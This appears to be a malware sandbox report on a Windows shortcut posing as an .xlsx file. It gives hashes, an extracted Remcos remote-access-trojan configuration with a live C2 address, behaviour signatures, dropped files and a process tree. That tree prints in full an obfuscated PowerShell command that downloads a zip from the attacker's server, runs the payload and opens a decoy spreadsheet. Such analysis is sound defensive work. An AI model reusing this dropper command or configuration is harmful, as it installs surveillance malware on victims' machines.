Overview

overview

10

Static

static

1

brt_1_0147.doc.lnk

windows7-x64

3

brt_1_0147.doc.lnk

windows10-2004-x64

10

oshad_88.docx.lnk

windows7-x64

3

oshad_88.docx.lnk

windows10-2004-x64

10

rv_luti_20...sx.lnk

windows7-x64

3

rv_luti_20...sx.lnk

windows10-2004-x64

10

telegrama_...pg.lnk

windows7-x64

3

telegrama_...pg.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-07-2024 02:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rv_luti_2024_roku.xlsx.lnk

  • Size

    32KB

  • MD5

    ccc8b9cd493472f0d518b807d3951fda

  • SHA1

    f76898a4231b6fd71a22781156206a76568b9279

  • SHA256

    6d93a42c2bffbf94f703b3bbe6e0e9026d76bfb501367bbeb1c2531e28ac6cab

  • SHA512

    40bfa4428eb7a1fa21d2bf75b972196935e6710920827fe49bdae758e3262f761731c2921ea0ef460f8bd2319ff00270787c09888995a276648be7e0cd1580df

  • SSDEEP

    48:808xwONuZDa46xCcgPcDpWdCZFXuGdZ+g:808KSuda46xCrPK9uL

Score
10/10
remcoshumadiscoveryrat

Malware Config

Extracted

Family

remcos

Botnet

huma

C2

81.19.139.74:4343

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-OMQQOG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo rohJqtLSzgkhnCsyQdlRvrLx; echo gnKNxpwYQdtqAhfUOOgJMiki; echo uhGwbyOTjoOplglUGgeI; if (-not(Test-Path 'pgg.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvpgg.zip -OutFile pgg.zip}; echo JImCFLVGXVGCYJtCYszgHvwZghmItRgbPblLOsYxfku; Expand-Archive -Path pgg.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/ScreenShot.exe; echo AMaAOEyDSTtcivafWkpIuqJFMWkCVYsArYkSPEnSPKzQeuvLcRviZ; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvracs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo cPOpvQGDupnLMOZZtJyTKSiSmvAsparrHiv; s''t''a''rt rv_luti_2024_roku.xlsx
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe
          C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4336
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:3408
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3064
      • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3924
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:2004
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:4992

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\6077308e
        Filesize

        1.2MB

        MD5

        f20b2385cc01f064837ed7233d34c91a

        SHA1

        e8375ebfd58060fc14c15675663eac2b3897cab6

        SHA256

        d499618f0219b99694422b44a6c713a71666ab85aaccfc9b763203be55a21631

        SHA512

        c028b09de2f41efb568fe74398f161290baa792201893a815842e0f9205464ebc74a87698ef4b167d4bcfbabcecd5b8031223d8f65513958e94d673fe1d6bf73

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ip0jpaqa.soi.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Filesize

        386B

        MD5

        b66d33aa3bb25b73a80f7e7cf7e09cd5

        SHA1

        d4f1a111ba8b5a2af148ed8c3e9072bedf074d0e

        SHA256

        0a167ea542b9a848fb7bd1031608ae33b4652ad1e80da13387b43bc2ccbf128c

        SHA512

        a515ffa76532363d5f6d1441cd3ab3c35d5993e8437ac3fc79528a581a064b818a2cd5519548aa38637ba6ba667ffc84cef0dab54ccc69b6f90a65c97ba91ac5

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
        Filesize

        2KB

        MD5

        023cf3fbb7319869171b2f5526eff2d2

        SHA1

        56bdeb66d926d15a84fa7df87c2753caf7bef123

        SHA256

        f5976b18fa55ded81121ce77cf66db3870c73272ae0a381ed2b4db1497eb2e91

        SHA512

        45cceabb87583eea85f9df4b85b7bf0f26f0072a46fd26aa17111311adcec27daa23cb95749fa3e22b2f4fc044bcecd1890df562e310fa94d288caa43bded175

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
        Filesize

        3KB

        MD5

        d37e1d20f2faa4733a31e3fa8267d49b

        SHA1

        a9071585941ecf5dd50b3a5dd0ca03b920a2f188

        SHA256

        c161eee4f4c9486427a370075932ec2ae94f7adb3b5c7be912cf6008dd47bfc1

        SHA512

        5259e85403de4f613a5f476aa63e42f849e2b849a08a26f5a47079ad1c1488976ef2dec941ff18a215157248ad1f3625f4bb71f1ffb8340a9e82c5bfc62ffd36

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe
        Filesize

        1.3MB

        MD5

        6a2cdd8709524999190f4b43a83108c9

        SHA1

        47b472ca518760552d1e0fa2d2321339dd596471

        SHA256

        bd0f954149173d3f5766eee5bd78d5f27ea1ea69667da7b3970b0e6154afc85f

        SHA512

        3b9a50892b7b18480380f69f0eb185b663e82da16064b60a262e9f3181f23ee8510b338eb28af7b961ab555082ffc494cc4fa950610d1991e6d1fa12ba497299

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\altorilievo.ppt
        Filesize

        942KB

        MD5

        e540c4fcecd77b819094eee15ced316a

        SHA1

        d45eb272fdf83641c942c0b7c66aa1ae313738a0

        SHA256

        577ddb0c94d3814a044af5a4ff2591f1e59d227ae00b37358427e2de2d80ff3d

        SHA512

        01ae43e96ae17b121f2c44b2c67f8ef66e7e278331d4c27d98206304b3a25d3dc211c3a1e2e2c6de6c342007cb67dcfbd7b6af7eeec5c5af5ad8421472d09c8e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\centenary.app
        Filesize

        29KB

        MD5

        ed5672e9357974fe27faa05c97b9c6ce

        SHA1

        f866486cd73b42d4aedddba71f16cad9d4554fcb

        SHA256

        530f8dbee1036b66a3c77512e216ab0f67779a3640daf2864d1fd8bd7e539c30

        SHA512

        246b0e833f6b081d9a839537039c1b3432501c2d42491cd5feb45e1a82c71e55370532d8854700eea3a335728cb5c4a7a396e6896ff896427a8f95befdf68252

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\madDisAsm_.bpl
        Filesize

        64KB

        MD5

        11efab4068cb4058207959e2638c2c1a

        SHA1

        b1eac0879dcda14bdc0c2efd7f261d7c175208c3

        SHA256

        11e3568f497c40331ee4a9e9973967e61b224e19204e09ed7451da3b74bd2ff5

        SHA512

        ced6167612674232429c25e52ba051994b09fdaeaf3316505904456ef8d7063f2eb03b5a158f0a424f0ecb49673e6a3d6b57d61183c5f8402da3fe53af0bd185

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\madExcept_.bpl
        Filesize

        438KB

        MD5

        562ec96d0f65b0309ad7508d0e0ced11

        SHA1

        0fe9dda664f4f8d9ae18603c5a25756710032a6f

        SHA256

        fb64a5954b726d2d0f0bc26113a36dc8a86c469af994ceeaf2e2609743a0a557

        SHA512

        876b82534764b2d156ce64d52771d38f245d330957287773f6b2360f48564b8d4a304449fa6f6400052165aaf433a191af2d3b38b194a9b1e892552dc0805fba

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\madbasic_.bpl
        Filesize

        212KB

        MD5

        a734f2428443030c46db9ce3ab2e68a6

        SHA1

        1bf4d3e9b4bf1d801a348f2e46cc9887bae12998

        SHA256

        038511fc64801be03d8472a2f7a6ba8a27e0398cf876be1427c1463cf9190c80

        SHA512

        d829ea13a0d736bee3a788822f5c04e58deff6175da735c25b8031d19e9c3c6bfa40af6882b6e842ba466ba0a5d51c766310491d73261a842334215edf09b699

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\rtl120.bpl
        Filesize

        1.1MB

        MD5

        e71e48e31ac728a6de7c020645f0c32f

        SHA1

        7f86eadd1b7a0ab87b7ce7c2029bdef3d6fe1d8d

        SHA256

        40a1d1a2f276738f568700ddccac99cdcd35b973fc8be86ab826c0d1abc9d6ff

        SHA512

        5e41dbe7efac8a042a14c2f976d1afcd45e3f7531fb60daab61ac17ffd339d34e1c6746fce9e4b591b026598a89e38f36c6d24e33e2de0b39d81806259f9be2a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\vcl120.bpl
        Filesize

        1.9MB

        MD5

        c8cff500ac30e5ef120ecb00bcdc0ebb

        SHA1

        6dc63844fbc7e9678d8653d715d1f65c8c9f834b

        SHA256

        7867aa9cb994e770c40e5b827d4f689bdc913b3466965b77a2b322d6c526045b

        SHA512

        de393681162c50507f3a54b957c264a25993e28b38ac7f21df9b2ce2eab9177a46e1336a88a5045c75aa66f5e9cf2b5edeef5516225bdd80ed0c01506489e8b0

        Download Submit

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\vclx120.bpl
        Filesize

        223KB

        MD5

        8aaa3926885b3fa7ae0448f5e700cb79

        SHA1

        47bd7d281ddde5ebef8599482212743bf2f7e67b

        SHA256

        47396c301fbe78bfaf9e344936a0f7a4e6d174c096f847e160d822e48012162d

        SHA512

        86d395ca89ec2a988f035ecb32640ddac99247e2568673246388fe310e8c3a44807049e8f3482fae86c453d5e3529a8f2daf8614a1086b6d979e64fd917bbe3a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx
        Filesize

        32KB

        MD5

        21046015d5d9ef5e536ac7643b1ab365

        SHA1

        f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05

        SHA256

        7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd

        SHA512

        d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e

        Download Submit

      • memory/2544-16-0x00007FFCFB0C0000-0x00007FFCFBB81000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2544-20-0x00000241E65D0000-0x00000241E65E2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2544-18-0x00007FFCFB0C0000-0x00007FFCFBB81000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2544-21-0x00000241E61F0000-0x00000241E61FA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2544-71-0x00007FFCFB0C0000-0x00007FFCFBB81000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2544-15-0x00007FFCFB0C3000-0x00007FFCFB0C5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2544-14-0x00007FFCFB0C0000-0x00007FFCFBB81000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2544-13-0x00007FFCFB0C0000-0x00007FFCFBB81000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2544-12-0x00000241E6220000-0x00000241E6242000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2544-2-0x00007FFCFB0C3000-0x00007FFCFB0C5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2972-92-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/2972-93-0x0000000050120000-0x000000005030D000-memory.dmp

        Filesize

        1.9MB

        Download

      • memory/2972-78-0x00007FFD198D0000-0x00007FFD19AC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2972-95-0x0000000057800000-0x0000000057812000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2972-96-0x0000000050310000-0x0000000050349000-memory.dmp

        Filesize

        228KB

        Download

      • memory/2972-91-0x0000000057000000-0x000000005703F000-memory.dmp

        Filesize

        252KB

        Download

      • memory/2972-73-0x0000000074740000-0x00000000748BB000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2972-90-0x0000000000400000-0x000000000058B000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2972-94-0x0000000059800000-0x000000005986E000-memory.dmp

        Filesize

        440KB

        Download

      • memory/3064-169-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-199-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-198-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-180-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-179-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-176-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-173-0x0000000000480000-0x0000000000504000-memory.dmp

        Filesize

        528KB

        Download

      • memory/3064-168-0x00007FFD198D0000-0x00007FFD19AC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/3408-149-0x00007FFD198D0000-0x00007FFD19AC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/3408-166-0x0000000074740000-0x00000000748BB000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/3924-74-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-88-0x00007FFCD78C0000-0x00007FFCD78D0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-114-0x00007FFCD78C0000-0x00007FFCD78D0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-194-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-195-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-75-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-72-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-196-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-76-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-197-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3924-77-0x00007FFCD9950000-0x00007FFCD9960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4336-139-0x0000000074740000-0x00000000748BB000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/4336-144-0x0000000059800000-0x000000005986E000-memory.dmp

        Filesize

        440KB

        Download

      • memory/4336-120-0x00007FFD198D0000-0x00007FFD19AC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/4336-143-0x0000000057000000-0x000000005703F000-memory.dmp

        Filesize

        252KB

        Download

      • memory/4336-146-0x0000000050120000-0x000000005030D000-memory.dmp

        Filesize

        1.9MB

        Download

      • memory/4336-147-0x0000000050310000-0x0000000050349000-memory.dmp

        Filesize

        228KB

        Download

      • memory/4336-142-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/4336-119-0x0000000074740000-0x00000000748BB000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/4336-141-0x0000000000400000-0x000000000058B000-memory.dmp

        Filesize

        1.5MB

        Download